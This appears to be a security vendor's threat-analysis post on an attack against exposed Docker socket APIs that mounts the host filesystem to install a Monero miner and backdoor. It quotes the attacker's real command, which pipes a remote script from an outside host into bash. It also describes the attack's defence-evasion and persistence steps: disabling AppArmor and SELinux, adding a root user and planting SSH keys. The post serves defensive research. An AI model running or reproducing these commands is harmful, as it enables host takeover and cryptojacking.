Docker clients can communicate with the daemon either locally, via a unix socket, or over a network via a TCP socket. Aqua's research team discovered an interesting attack vector running on top of an unsecured Docker socket API. Instead of running a malicious Docker image, the attacker changes the traditional entry-point to take control over the host machine via a Docker Socket.
An attacker is able to mount the host’s file system by passing the flag,“ -v /:mnt”, to the “docker run” command. This basic capability of the Docker API is usually used to gain file persistency and is commonly used by containers. By mounting the file system, the attacker gains the ability to access the host’s file system and modify the host’s cron job scheduler to run the malicious payload. This activity wasn’t rooted in the deployed Docker image, but rather it was a legitimate image that was designed to avoid conventional tools that could detect the malicious payload.
The image entry point was changed in order to download a script designed to execute the nefarious act.
|chroot /mnt /bin/sh -c /sbin/sysctl -w net.ipv4.conf.all.forwarding=1;curl -s http://gyazo.nl/411d2790f01244c93a864d51125722e8;curl -s -L http://ix.io/1XQa | bash;|
Note: The curl command at the end of the cmd contains a bash script, which is the payload.
The actual payload consists of a large bash script that runs directly on the host machine and leaves a backdoor in which a hacker can execute the mining algorithm.
The first step is a bash script that performs tests to identify possible threats and disable them immediately. For example, it can disable apparmor and selinux. (These are used to restrict programs capabilities, such as setting permissions on certain paths, or blocking the execution of applications on the host machine.)
Interestingly, after disabling the security applications, it attempted to uninstall a cloud monitoring system that comes prefixed in Alibaba Cloud and Qcloud. Next, the “useradd” command creates a new root user on the host. This is not done on the container, but rather on the host, so that it can continue running in privileged mode.
It provides access via SSH logins from a remote machine to our host by adding an authorized key to gain persistency.
The miner executable and config files are downloaded and the executable parses relevant parameters from the config file and begins mining.
By executing the binary, we receive the following instructions:
When loading on IDA, we see a statically linked binary which contains multiple XMR mining functions.
By uploading the file to VirusTotal, we see that this is a cryptocurrency mining executable:
While running an open API Docker may not seem risky, it could compromise your host and make it vulnerable to hijacking for cryptocurrency mining and even a full takeover. This simple oversight could cause real damage. It could render your entire production internal network vulnerable and thereby compromise your sensitive databases, code, and productions systems.
Indicators of Compromise (IoCs):
Miner file :
Monero Address :
Aqua Security is the largest pure-play cloud native security company, providing customers the freedom to innovate and accelerate their digital transformations. The Aqua Platform provides prevention, detection, and response automation across the entire application lifecycle to secure the build, secure cloud infrastructure and secure running workloads, wherever they are deployed.
Aqua customers are among the world’s largest enterprises in financial services, software, media, manufacturing and retail, with implementations across a broad range of cloud providers and modern technology stacks spanning containers, serverless functions and cloud VMs.